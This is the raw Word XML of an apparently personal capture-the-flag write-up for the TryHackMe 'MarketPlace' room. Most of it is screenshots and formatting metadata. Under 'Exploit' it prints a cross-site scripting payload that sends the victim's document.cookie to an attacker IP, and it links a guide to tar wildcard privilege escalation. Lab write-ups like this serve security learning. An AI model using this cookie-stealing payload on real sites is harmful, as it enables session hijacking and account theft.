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DE" w:rsidRDefault="00C00479" w:rsidP="00B840DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MarketPlace</w:t>
      </w:r>
      <w:r w:rsidR="00E067DA">
        <w:t xml:space="preserve"> THM - Medium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C467BC" w:rsidRDefault="00CB0DBC" w:rsidP="00B840DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>INFORMATION GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C28BB" w:rsidRPr="008C28BB" w:rsidRDefault="008C28BB" w:rsidP="008C28BB">
      <w:r w:rsidRPr="008C28BB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0851D39F" wp14:editId="007C9E35">
            <wp:extent cx="5943600" cy="2472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AB" w:rsidRDefault="00F35FAB" w:rsidP="00C2517E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE09EA" w:rsidRDefault="00B167A3" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00B167A3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28941DD3" wp14:editId="79434BB5">
            <wp:extent cx="5943600" cy="2653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3BE" w:rsidRDefault="00BC43BE" w:rsidP="00E40F61"/>
    <w:p w:rsidR="0003166B" w:rsidRDefault="00CD4411" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00CD4411">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F6D933A" wp14:editId="575616B3">
            <wp:extent cx="5943600" cy="26339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90" w:rsidRDefault="003F5090" w:rsidP="00E40F61">
      <w:r>
        <w:t>Payload use</w:t>
      </w:r>
      <w:r w:rsidR="00614A24">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5090">
        <w:t>&lt;script&gt;document.write('&lt;img src="http://10.23.90.185:80/?'+document.cookie+'"/&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4C99" w:rsidRDefault="00155D0A" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00155D0A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47330D76" wp14:editId="089F81BC">
            <wp:extent cx="5943600" cy="2336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14" w:rsidRDefault="00830232" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00830232">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3693E28E" wp14:editId="4944E101">
            <wp:extent cx="5943600" cy="25457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99" w:rsidRDefault="00771F99" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00771F99">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B85095" wp14:editId="764FF223">
            <wp:extent cx="5943600" cy="1717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89" w:rsidRDefault="005128A9" w:rsidP="00E40F61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B12D409" wp14:editId="7DC485E9">
            <wp:extent cx="5943600" cy="2696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FB" w:rsidRDefault="003169FB" w:rsidP="00E40F61"/>
    <w:p w:rsidR="00B86ED5" w:rsidRDefault="00081F59" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00081F59">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287F7ABA" wp14:editId="2AF927B2">
            <wp:extent cx="5943600" cy="30016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9C" w:rsidRDefault="003C39A6" w:rsidP="00E40F61">
      <w:r w:rsidRPr="003C39A6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677B9441" wp14:editId="7F07470D">
            <wp:extent cx="5943600" cy="2726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76" w:rsidRDefault="00614876" w:rsidP="00E40F61">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CDB0D7" wp14:editId="22FFA43C">
            <wp:extent cx="5943600" cy="2590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0AA" w:rsidRDefault="009A7132" w:rsidP="00E40F61">
      <w:r w:rsidRPr="009A7132">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D88EE61" wp14:editId="1A46E5B6">
            <wp:extent cx="5943600" cy="25571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7AA9" w:rsidRDefault="00EE1B14" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00EE1B14">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206B086D" wp14:editId="430A9F4A">
            <wp:extent cx="5943600" cy="2727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4E" w:rsidRDefault="0069794E" w:rsidP="00E40F61"/>
    <w:p w:rsidR="00254726" w:rsidRDefault="008D1E6A" w:rsidP="00E40F61">
      <w:r w:rsidRPr="008D1E6A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF6AFD8" wp14:editId="219AB9F2">
            <wp:extent cx="5943600" cy="28854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CA" w:rsidRDefault="00DB68B5" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00DB68B5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16299F88" wp14:editId="7966BEF5">
            <wp:extent cx="5943600" cy="2682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A1" w:rsidRDefault="001430A1" w:rsidP="00E40F61">
      <w:r w:rsidRPr="001430A1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1956A086" wp14:editId="1FD78059">
            <wp:extent cx="5943600" cy="6445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B" w:rsidRDefault="00641886" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00641886">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F54687E" wp14:editId="02CA928A">
            <wp:extent cx="5166808" cy="8001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C4" w:rsidRDefault="00AD306A" w:rsidP="00DB0BC4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00B95A3F" w:rsidRPr="00B95A3F">
        <w:t xml:space="preserve">his post explaining how to exploit the wildcard </w:t>
      </w:r>
      <w:r w:rsidR="00DB0BC4">
        <w:t>in tar for privilege escalation</w:t>
      </w:r>
      <w:r w:rsidR="006510CA">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00DB0BC4" w:rsidRPr="001B1ECE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F52C79" w:rsidRDefault="00072679" w:rsidP="00DB0BC4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E7EC2F" wp14:editId="6E44E2A4">
            <wp:extent cx="5943600" cy="15405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434" w:rsidRDefault="00D03B5C" w:rsidP="00DB0BC4">
      <w:r w:rsidRPr="00D03B5C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D4BB4C" wp14:editId="7AC37E49">
            <wp:extent cx="5943600" cy="9105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B3E" w:rsidRDefault="00324820" w:rsidP="00DB0BC4">
      <w:r w:rsidRPr="00324820">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297F6A5B" wp14:editId="533600CD">
            <wp:extent cx="5943600" cy="7232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A3F" w:rsidRDefault="00C8268E" w:rsidP="00E40F61">
      <w:r w:rsidRPr="00C8268E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16517D11" wp14:editId="2522C248">
            <wp:extent cx="4861981" cy="5334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A1" w:rsidRDefault="001430A1" w:rsidP="00E40F61"/>
    <w:p w:rsidR="00DB19F3" w:rsidRPr="00E40F61" w:rsidRDefault="00DB19F3" w:rsidP="00E40F61"/>
    <w:sectPr w:rsidR="00DB19F3" w:rsidRPr="00E40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D4F86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A78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8717EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9052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765EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC848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B8"/>
    <w:rsid w:val="00003C74"/>
    <w:rsid w:val="0003166B"/>
    <w:rsid w:val="000405D3"/>
    <w:rsid w:val="00052E65"/>
    <w:rsid w:val="0005363B"/>
    <w:rsid w:val="00057099"/>
    <w:rsid w:val="000573AB"/>
    <w:rsid w:val="000577A9"/>
    <w:rsid w:val="00064C86"/>
    <w:rsid w:val="00066077"/>
    <w:rsid w:val="00067FE6"/>
    <w:rsid w:val="00072679"/>
    <w:rsid w:val="00081F59"/>
    <w:rsid w:val="00083DB1"/>
    <w:rsid w:val="00097C1D"/>
    <w:rsid w:val="00117BC1"/>
    <w:rsid w:val="00123535"/>
    <w:rsid w:val="00131F9A"/>
    <w:rsid w:val="00135BC1"/>
    <w:rsid w:val="001430A1"/>
    <w:rsid w:val="00144FFC"/>
    <w:rsid w:val="00155D0A"/>
    <w:rsid w:val="00164200"/>
    <w:rsid w:val="00193589"/>
    <w:rsid w:val="001A6C14"/>
    <w:rsid w:val="001B3B42"/>
    <w:rsid w:val="001C4DB0"/>
    <w:rsid w:val="001C50BA"/>
    <w:rsid w:val="001D2747"/>
    <w:rsid w:val="001D6083"/>
    <w:rsid w:val="001E61A5"/>
    <w:rsid w:val="001F1825"/>
    <w:rsid w:val="00204E78"/>
    <w:rsid w:val="002073E8"/>
    <w:rsid w:val="002179C5"/>
    <w:rsid w:val="00250B13"/>
    <w:rsid w:val="00254726"/>
    <w:rsid w:val="00277F84"/>
    <w:rsid w:val="002A5373"/>
    <w:rsid w:val="002A7614"/>
    <w:rsid w:val="002B059C"/>
    <w:rsid w:val="002E15CB"/>
    <w:rsid w:val="00302DDA"/>
    <w:rsid w:val="003169FB"/>
    <w:rsid w:val="00321BFC"/>
    <w:rsid w:val="00324497"/>
    <w:rsid w:val="00324820"/>
    <w:rsid w:val="00333DFE"/>
    <w:rsid w:val="003372B6"/>
    <w:rsid w:val="00375F7A"/>
    <w:rsid w:val="00387B8B"/>
    <w:rsid w:val="00397810"/>
    <w:rsid w:val="003A676D"/>
    <w:rsid w:val="003B7E1B"/>
    <w:rsid w:val="003C39A6"/>
    <w:rsid w:val="003F5090"/>
    <w:rsid w:val="004148B3"/>
    <w:rsid w:val="004151BF"/>
    <w:rsid w:val="0042780C"/>
    <w:rsid w:val="00435B91"/>
    <w:rsid w:val="00451262"/>
    <w:rsid w:val="004561BD"/>
    <w:rsid w:val="00462870"/>
    <w:rsid w:val="00470CE6"/>
    <w:rsid w:val="0048086F"/>
    <w:rsid w:val="0048575A"/>
    <w:rsid w:val="00491A72"/>
    <w:rsid w:val="004B40AA"/>
    <w:rsid w:val="004B7BF2"/>
    <w:rsid w:val="004D4FF4"/>
    <w:rsid w:val="004D6C71"/>
    <w:rsid w:val="005026B7"/>
    <w:rsid w:val="005047F6"/>
    <w:rsid w:val="005050B8"/>
    <w:rsid w:val="005128A9"/>
    <w:rsid w:val="0051307C"/>
    <w:rsid w:val="00532C20"/>
    <w:rsid w:val="00540E10"/>
    <w:rsid w:val="005601CF"/>
    <w:rsid w:val="00566675"/>
    <w:rsid w:val="005763BC"/>
    <w:rsid w:val="005805B3"/>
    <w:rsid w:val="00595CB8"/>
    <w:rsid w:val="005E318F"/>
    <w:rsid w:val="005E7C4E"/>
    <w:rsid w:val="00614876"/>
    <w:rsid w:val="00614A24"/>
    <w:rsid w:val="00626EEB"/>
    <w:rsid w:val="00632ED5"/>
    <w:rsid w:val="00641886"/>
    <w:rsid w:val="006510CA"/>
    <w:rsid w:val="00660F4B"/>
    <w:rsid w:val="006746E5"/>
    <w:rsid w:val="0069794E"/>
    <w:rsid w:val="006A533A"/>
    <w:rsid w:val="006C006D"/>
    <w:rsid w:val="006E33D5"/>
    <w:rsid w:val="006E3CB4"/>
    <w:rsid w:val="00707783"/>
    <w:rsid w:val="00741D9C"/>
    <w:rsid w:val="00743FC8"/>
    <w:rsid w:val="0075411D"/>
    <w:rsid w:val="00771F99"/>
    <w:rsid w:val="007763F3"/>
    <w:rsid w:val="007812D6"/>
    <w:rsid w:val="00782B86"/>
    <w:rsid w:val="007A3178"/>
    <w:rsid w:val="007A70AE"/>
    <w:rsid w:val="007E3B70"/>
    <w:rsid w:val="007E3FAE"/>
    <w:rsid w:val="007F1E09"/>
    <w:rsid w:val="00827AA9"/>
    <w:rsid w:val="00830232"/>
    <w:rsid w:val="00830F0C"/>
    <w:rsid w:val="00874780"/>
    <w:rsid w:val="00880FDC"/>
    <w:rsid w:val="00894BAF"/>
    <w:rsid w:val="008A259F"/>
    <w:rsid w:val="008A6D5B"/>
    <w:rsid w:val="008C233F"/>
    <w:rsid w:val="008C25AA"/>
    <w:rsid w:val="008C28BB"/>
    <w:rsid w:val="008D1E6A"/>
    <w:rsid w:val="008F5928"/>
    <w:rsid w:val="00911D55"/>
    <w:rsid w:val="00917D3D"/>
    <w:rsid w:val="00920EF8"/>
    <w:rsid w:val="00950070"/>
    <w:rsid w:val="009614B3"/>
    <w:rsid w:val="009A7132"/>
    <w:rsid w:val="009C496E"/>
    <w:rsid w:val="009C4BEB"/>
    <w:rsid w:val="009D1D46"/>
    <w:rsid w:val="009E7260"/>
    <w:rsid w:val="00A24E61"/>
    <w:rsid w:val="00A30A49"/>
    <w:rsid w:val="00A34F90"/>
    <w:rsid w:val="00A369B3"/>
    <w:rsid w:val="00A61075"/>
    <w:rsid w:val="00A809DE"/>
    <w:rsid w:val="00AD306A"/>
    <w:rsid w:val="00AE7A54"/>
    <w:rsid w:val="00B07B99"/>
    <w:rsid w:val="00B103BB"/>
    <w:rsid w:val="00B167A3"/>
    <w:rsid w:val="00B30A3A"/>
    <w:rsid w:val="00B41FB9"/>
    <w:rsid w:val="00B569DB"/>
    <w:rsid w:val="00B61434"/>
    <w:rsid w:val="00B71E9C"/>
    <w:rsid w:val="00B74830"/>
    <w:rsid w:val="00B840DE"/>
    <w:rsid w:val="00B86ED5"/>
    <w:rsid w:val="00B900DC"/>
    <w:rsid w:val="00B924E2"/>
    <w:rsid w:val="00B95A3F"/>
    <w:rsid w:val="00BC43BE"/>
    <w:rsid w:val="00BE2A84"/>
    <w:rsid w:val="00C00479"/>
    <w:rsid w:val="00C0795E"/>
    <w:rsid w:val="00C177CB"/>
    <w:rsid w:val="00C20288"/>
    <w:rsid w:val="00C2517E"/>
    <w:rsid w:val="00C323F2"/>
    <w:rsid w:val="00C40B19"/>
    <w:rsid w:val="00C436B8"/>
    <w:rsid w:val="00C467BC"/>
    <w:rsid w:val="00C46875"/>
    <w:rsid w:val="00C63384"/>
    <w:rsid w:val="00C70F94"/>
    <w:rsid w:val="00C73CBE"/>
    <w:rsid w:val="00C81159"/>
    <w:rsid w:val="00C8268E"/>
    <w:rsid w:val="00C963DA"/>
    <w:rsid w:val="00CA368A"/>
    <w:rsid w:val="00CB0DBC"/>
    <w:rsid w:val="00CC0AFB"/>
    <w:rsid w:val="00CC7EB0"/>
    <w:rsid w:val="00CD4411"/>
    <w:rsid w:val="00CE09EA"/>
    <w:rsid w:val="00CF1AAA"/>
    <w:rsid w:val="00CF5BFA"/>
    <w:rsid w:val="00D002BA"/>
    <w:rsid w:val="00D00CE0"/>
    <w:rsid w:val="00D03B5C"/>
    <w:rsid w:val="00D1776F"/>
    <w:rsid w:val="00D17B02"/>
    <w:rsid w:val="00D250D5"/>
    <w:rsid w:val="00D5739B"/>
    <w:rsid w:val="00D61B3E"/>
    <w:rsid w:val="00D62839"/>
    <w:rsid w:val="00D72A41"/>
    <w:rsid w:val="00DB052F"/>
    <w:rsid w:val="00DB0BC4"/>
    <w:rsid w:val="00DB115A"/>
    <w:rsid w:val="00DB136D"/>
    <w:rsid w:val="00DB19F3"/>
    <w:rsid w:val="00DB68B5"/>
    <w:rsid w:val="00DD23E2"/>
    <w:rsid w:val="00DD4C99"/>
    <w:rsid w:val="00E04CBC"/>
    <w:rsid w:val="00E067DA"/>
    <w:rsid w:val="00E110F7"/>
    <w:rsid w:val="00E21096"/>
    <w:rsid w:val="00E21639"/>
    <w:rsid w:val="00E40F61"/>
    <w:rsid w:val="00E531CA"/>
    <w:rsid w:val="00E57449"/>
    <w:rsid w:val="00E62D9E"/>
    <w:rsid w:val="00E63C72"/>
    <w:rsid w:val="00E64393"/>
    <w:rsid w:val="00E80610"/>
    <w:rsid w:val="00E8292C"/>
    <w:rsid w:val="00E85C10"/>
    <w:rsid w:val="00E87EB1"/>
    <w:rsid w:val="00E91F76"/>
    <w:rsid w:val="00E95411"/>
    <w:rsid w:val="00EC0EDA"/>
    <w:rsid w:val="00EC4BC3"/>
    <w:rsid w:val="00EE1B14"/>
    <w:rsid w:val="00EE23BA"/>
    <w:rsid w:val="00F270C4"/>
    <w:rsid w:val="00F339F0"/>
    <w:rsid w:val="00F345B4"/>
    <w:rsid w:val="00F35FAB"/>
    <w:rsid w:val="00F431E5"/>
    <w:rsid w:val="00F52C79"/>
    <w:rsid w:val="00F52E69"/>
    <w:rsid w:val="00F838FC"/>
    <w:rsid w:val="00F839BB"/>
    <w:rsid w:val="00F8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6AC4056-11DC-436B-8711-96B7B624A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324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DB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87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5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E6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B0DB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DBC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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B3B4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607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6875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5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A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A3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0474">
              <w:blockQuote w:val="1"/>
              <w:marLeft w:val="0"/>
              <w:marRight w:val="240"/>
              <w:marTop w:val="480"/>
              <w:marBottom w:val="480"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="24" w:space="12" w:color="00ADB5"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1590505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2685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456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6199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126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56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8285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197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166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28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020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5266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1628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12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2891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924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76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56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58978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757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685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50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625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7778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482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096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6587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474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7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483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21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hackingarticles.in/exploiting-wildcard-for-privilege-escalatio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6E5A-D898-43DD-8C2B-022BB246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7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0</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-21T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T15:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>